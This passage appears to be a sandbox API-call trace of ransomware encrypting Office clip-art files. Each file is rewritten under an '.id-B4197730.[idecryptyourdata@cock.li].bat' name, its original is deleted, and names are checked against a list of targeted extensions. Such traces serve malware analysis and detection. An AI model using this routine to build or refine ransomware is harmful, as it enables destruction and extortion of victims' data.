lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x3b30, lpOverlapped=0x0) returned 1 [0198.015] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.015] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.015] SetEndOfFile (hFile=0x374) returned 1 [0198.016] CloseHandle (hObject=0x374) returned 1 [0198.016] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.016] SetEndOfFile (hFile=0x360) returned 1 [0198.017] CloseHandle (hObject=0x360) returned 1 [0198.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.017] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182898.wmf")) returned 1 [0198.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF") returned 68 [0198.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF") returned 68 [0198.018] lstrlenW (lpString=".doc") returned 4 [0198.018] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.018] lstrlenW (lpString=".docx") returned 5 [0198.018] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0198.018] lstrlenW (lpString=".pdf") returned 4 [0198.018] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.018] lstrlenW (lpString=".xls") returned 4 [0198.018] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.018] lstrlenW (lpString=".xlsx") returned 5 [0198.018] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0198.018] lstrlenW (lpString=".ppt") returned 4 [0198.018] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF") returned 68 [0198.018] lstrlenW (lpString=".zip") returned 4 [0198.018] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.018] lstrlenW (lpString=".rar") returned 4 [0198.019] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.019] lstrlenW (lpString=".bz2") returned 4 [0198.019] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.019] lstrlenW (lpString=".7z") returned 3 [0198.019] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF") returned 68 [0198.019] lstrlenW (lpString=".dbf") returned 4 [0198.019] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF") returned 68 [0198.019] lstrlenW (lpString=".1cd") returned 4 [0198.019] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF") returned 68 [0198.019] lstrlenW (lpString=".jpg") returned 4 [0198.019] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.019] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.019] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182902.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0198.020] GetLastError () returned 0x0 [0198.020] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1e8e, lpOverlapped=0x0) returned 1 [0198.022] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1e90, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1e90, lpOverlapped=0x0) returned 1 [0198.023] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.024] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.024] SetEndOfFile (hFile=0x374) returned 1 [0198.024] CloseHandle (hObject=0x374) returned 1 [0198.024] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.024] SetEndOfFile (hFile=0x360) returned 1 [0198.025] CloseHandle (hObject=0x360) returned 1 [0198.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.026] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182902.wmf")) returned 1 [0198.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF") returned 68 [0198.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF") returned 68 [0198.027] lstrlenW (lpString=".doc") returned 4 [0198.027] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.027] lstrlenW (lpString=".docx") returned 5 [0198.027] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0198.027] lstrlenW (lpString=".pdf") returned 4 [0198.027] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.027] lstrlenW (lpString=".xls") returned 4 [0198.027] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.027] lstrlenW (lpString=".xlsx") returned 5 [0198.027] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0198.027] lstrlenW (lpString=".ppt") returned 4 [0198.027] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF") returned 68 [0198.027] lstrlenW (lpString=".zip") returned 4 [0198.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.027] lstrlenW (lpString=".rar") returned 4 [0198.027] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.027] lstrlenW (lpString=".bz2") returned 4 [0198.027] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.027] lstrlenW (lpString=".7z") returned 3 [0198.027] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF") returned 68 [0198.027] lstrlenW (lpString=".dbf") returned 4 [0198.027] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF") returned 68 [0198.027] lstrlenW (lpString=".1cd") returned 4 [0198.027] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF") returned 68 [0198.027] lstrlenW (lpString=".jpg") returned 4 [0198.028] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.028] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.028] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182946.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0198.029] GetLastError () returned 0x0 [0198.029] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x3ed2, lpOverlapped=0x0) returned 1 [0198.051] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x3ee0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x3ee0, lpOverlapped=0x0) returned 1 [0198.052] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.052] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.052] SetEndOfFile (hFile=0x374) returned 1 [0198.052] CloseHandle (hObject=0x374) returned 1 [0198.052] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.052] SetEndOfFile (hFile=0x360) returned 1 [0198.053] CloseHandle (hObject=0x360) returned 1 [0198.053] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.054] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182946.wmf")) returned 1 [0198.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF") returned 68 [0198.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF") returned 68 [0198.055] lstrlenW (lpString=".doc") returned 4 [0198.055] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.055] lstrlenW (lpString=".docx") returned 5 [0198.055] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0198.055] lstrlenW (lpString=".pdf") returned 4 [0198.055] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.055] lstrlenW (lpString=".xls") returned 4 [0198.055] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.055] lstrlenW (lpString=".xlsx") returned 5 [0198.055] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0198.055] lstrlenW (lpString=".ppt") returned 4 [0198.055] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF") returned 68 [0198.055] lstrlenW (lpString=".zip") returned 4 [0198.055] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.055] lstrlenW (lpString=".rar") returned 4 [0198.055] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.055] lstrlenW (lpString=".bz2") returned 4 [0198.055] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.055] lstrlenW (lpString=".7z") returned 3 [0198.055] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF") returned 68 [0198.055] lstrlenW (lpString=".dbf") returned 4 [0198.055] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF") returned 68 [0198.055] lstrlenW (lpString=".1cd") returned 4 [0198.055] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF") returned 68 [0198.055] lstrlenW (lpString=".jpg") returned 4 [0198.056] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.056] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.056] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183172.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0198.057] GetLastError () returned 0x0 [0198.057] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x745c, lpOverlapped=0x0) returned 1 [0198.062] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x7460, lpOverlapped=0x0) returned 1 [0198.063] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.063] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.063] SetEndOfFile (hFile=0x374) returned 1 [0198.063] CloseHandle (hObject=0x374) returned 1 [0198.063] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.064] SetEndOfFile (hFile=0x360) returned 1 [0198.065] CloseHandle (hObject=0x360) returned 1 [0198.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.065] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183172.wmf")) returned 1 [0198.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF") returned 68 [0198.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF") returned 68 [0198.283] lstrlenW (lpString=".doc") returned 4 [0198.283] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.283] lstrlenW (lpString=".docx") returned 5 [0198.283] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0198.283] lstrlenW (lpString=".pdf") returned 4 [0198.283] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.283] lstrlenW (lpString=".xls") returned 4 [0198.283] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.283] lstrlenW (lpString=".xlsx") returned 5 [0198.283] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0198.283] lstrlenW (lpString=".ppt") returned 4 [0198.283] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF") returned 68 [0198.283] lstrlenW (lpString=".zip") returned 4 [0198.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.283] lstrlenW (lpString=".rar") returned 4 [0198.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.283] lstrlenW (lpString=".bz2") returned 4 [0198.283] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.283] lstrlenW (lpString=".7z") returned 3 [0198.283] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF") returned 68 [0198.283] lstrlenW (lpString=".dbf") returned 4 [0198.283] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF") returned 68 [0198.283] lstrlenW (lpString=".1cd") returned 4 [0198.283] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF") returned 68 [0198.284] lstrlenW (lpString=".jpg") returned 4 [0198.284] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.284] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.284] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185806.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0198.285] GetLastError () returned 0x0 [0198.285] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x773a, lpOverlapped=0x0) returned 1 [0198.288] WriteFile (in: hFile=0x398, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x7740, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x7740, lpOverlapped=0x0) returned 1 [0198.289] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.289] WriteFile (in: hFile=0x398, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.289] SetEndOfFile (hFile=0x398) returned 1 [0198.290] CloseHandle (hObject=0x398) returned 1 [0198.290] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.290] SetEndOfFile (hFile=0x360) returned 1 [0198.291] CloseHandle (hObject=0x360) returned 1 [0198.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.291] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185806.wmf")) returned 1 [0198.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF") returned 68 [0198.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF") returned 68 [0198.292] lstrlenW (lpString=".doc") returned 4 [0198.292] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.292] lstrlenW (lpString=".docx") returned 5 [0198.292] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0198.292] lstrlenW (lpString=".pdf") returned 4 [0198.292] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.292] lstrlenW (lpString=".xls") returned 4 [0198.292] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.292] lstrlenW (lpString=".xlsx") returned 5 [0198.292] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0198.292] lstrlenW (lpString=".ppt") returned 4 [0198.292] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF") returned 68 [0198.292] lstrlenW (lpString=".zip") returned 4 [0198.293] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.293] lstrlenW (lpString=".rar") returned 4 [0198.293] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.293] lstrlenW (lpString=".bz2") returned 4 [0198.293] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.293] lstrlenW (lpString=".7z") returned 3 [0198.293] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF") returned 68 [0198.293] lstrlenW (lpString=".dbf") returned 4 [0198.293] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF") returned 68 [0198.293] lstrlenW (lpString=".1cd") returned 4 [0198.293] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF") returned 68 [0198.293] lstrlenW (lpString=".jpg") returned 4 [0198.293] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.294] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.294] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185818.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0198.294] GetLastError () returned 0x0 [0198.294] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x8b8e, lpOverlapped=0x0) returned 1 [0198.297] WriteFile (in: hFile=0x398, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x8b90, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x8b90, lpOverlapped=0x0) returned 1 [0198.299] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.299] WriteFile (in: hFile=0x398, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.299] SetEndOfFile (hFile=0x398) returned 1 [0198.299] CloseHandle (hObject=0x398) returned 1 [0198.299] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.299] SetEndOfFile (hFile=0x360) returned 1 [0198.300] CloseHandle (hObject=0x360) returned 1 [0198.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.301] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185818.wmf")) returned 1 [0198.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF") returned 68 [0198.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF") returned 68 [0198.301] lstrlenW (lpString=".doc") returned 4 [0198.301] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.301] lstrlenW (lpString=".docx") returned 5 [0198.301] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0198.301] lstrlenW (lpString=".pdf") returned 4 [0198.301] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.301] lstrlenW (lpString=".xls") returned 4 [0198.302] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.302] lstrlenW (lpString=".xlsx") returned 5 [0198.302] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 